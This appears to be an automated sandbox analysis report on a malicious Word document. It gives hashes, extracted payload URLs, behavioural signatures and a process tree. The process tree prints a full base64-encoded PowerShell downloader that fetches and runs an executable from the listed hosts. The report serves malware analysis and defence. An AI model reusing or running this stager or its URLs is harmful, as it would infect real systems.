Analysis
-
max time kernel
147s -
max time network
141s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
01-08-2020 19:37
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.12174.29464.11497.doc
Resource
win7
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Exploit.Siggen2.12174.29464.11497.doc
Resource
win10v200722
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.12174.29464.11497.doc
-
Size
172KB
-
MD5
9c00d588f7b6a159c855b93627492516
-
SHA1
fa1ed3fb2e4e6f7d8747584b8a1969e85daa4909
-
SHA256
061f4c387df2a0e388b644d647379077b84ea8a2a52eec31d3e2f95b0984be9f
-
SHA512
5da86f8939b379be6373a8f95d648c7a0046e0e1a5c102173cab90819c84f9abb10c2be5575e1df5c66348ace3e94926e5eee5638a71c98565be844ecc8bbe54
Malware Config
Extracted
http://www.hatchdogs.com/assets/XIw/
https://groovyboove.co.uk/blogs/8T94mmdka13/
https://gregemerson.com/wp-includes/hudy17240/
http://guariz.com.br/WuutjlO/
http://hafder.com/images/fhq7h7babdbe5q5052/
Signatures
-
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXEpid process 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 508 WINWORD.EXE 508 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3580 1144 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 3580 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powersheLL.exepid process 3580 powersheLL.exe 3580 powersheLL.exe 3580 powersheLL.exe -
Blacklisted process makes network request 3 IoCs
Processes:
powersheLL.exeflow pid process 24 3580 powersheLL.exe 26 3580 powersheLL.exe 28 3580 powersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.12174.29464.11497.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABVAE0AQwBOAEwAbQBmAGUAPQAnAFIAVABFAE8ATQBjAGYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBUAGAAeQBgAHAAcgBPAGAAVABvAEMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQARQBEAE8AQQBXAGwAcQB2ACAAPQAgACcANwA0ADQAJwA7ACQASwBCAEEATgBIAGsAbQBvAD0AJwBaAEEARgBFAEIAdABxAHAAJwA7ACQAQwBRAEMAQwBXAHoAdwBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABFAEQATwBBAFcAbABxAHYAKwAnAC4AZQB4AGUAJwA7ACQAUABGAFAAVwBTAG0AZgB0AD0AJwBRAFEATQBVAFQAcwBiAGwAJwA7ACQATwBDAEQAWABEAHcAZQBrAD0ALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcARQBiAGMAbABJAGUATgBUADsAJABNAFgAWgBLAFUAYQBxAHIAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBoAGEAdABjAGgAZABvAGcAcwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBYAEkAdwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBvAG8AdgB5AGIAbwBvAHYAZQAuAGMAbwAuAHUAawAvAGIAbABvAGcAcwAvADgAVAA5ADQAbQBtAGQAawBhADEAMwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBlAGcAZQBtAGUAcgBzAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaAB1AGQAeQAxADcAMgA0ADAALwAqAGgAdAB0AHAAOgAvAC8AZwB1AGEAcgBpAHoALgBjAG8AbQAuAGIAcgAvAFcAdQB1AHQAagBsAE8ALwAqAGgAdAB0AHAAOgAvAC8AaABhAGYAZABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AZgBoAHEANwBoADcAYgBhAGIAZABiAGUANQBxADUAMAA1ADIALwAnAC4AIgBTAHAATABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAWQBVAEMAWgB5AHMAZQA9ACcATABPAEQAVQBWAG0AcgBuACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAFgAUgBWAFgAcABsAGIAIABpAG4AIAAkAE0AWABaAEsAVQBhAHEAcgApAHsAdAByAHkAewAkAE8AQwBEAFgARAB3AGUAawAuACIAZABPAGAAVwBuAGAAbABgAE8AYQBEAEYAaQBMAEUAIgAoACQAWgBYAFIAVgBYAHAAbABiACwAIAAkAEMAUQBDAEMAVwB6AHcAbgApADsAJABaAE4ASQBOAEkAbgB6AHcAPQAnAEEARQBHAE4ARABwAHkAdwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEMAUQBDAEMAVwB6AHcAbgApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMwAyADkANQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAHQAZQAiACgAJABDAFEAQwBDAFcAegB3AG4AKQA7ACQATQBGAFIARQBOAGIAdABlAD0AJwBWAFYAWgBDAEcAZABiAHkAJwA7AGIAcgBlAGEAawA7ACQARwBQAEcARABDAGEAcgB6AD0AJwBYAEwATwBWAFkAdgB4AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBKAFUATQBQAGkAcgBhAD0AJwBCAEMAQQBKAEIAcQBtAHAAJwA=1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request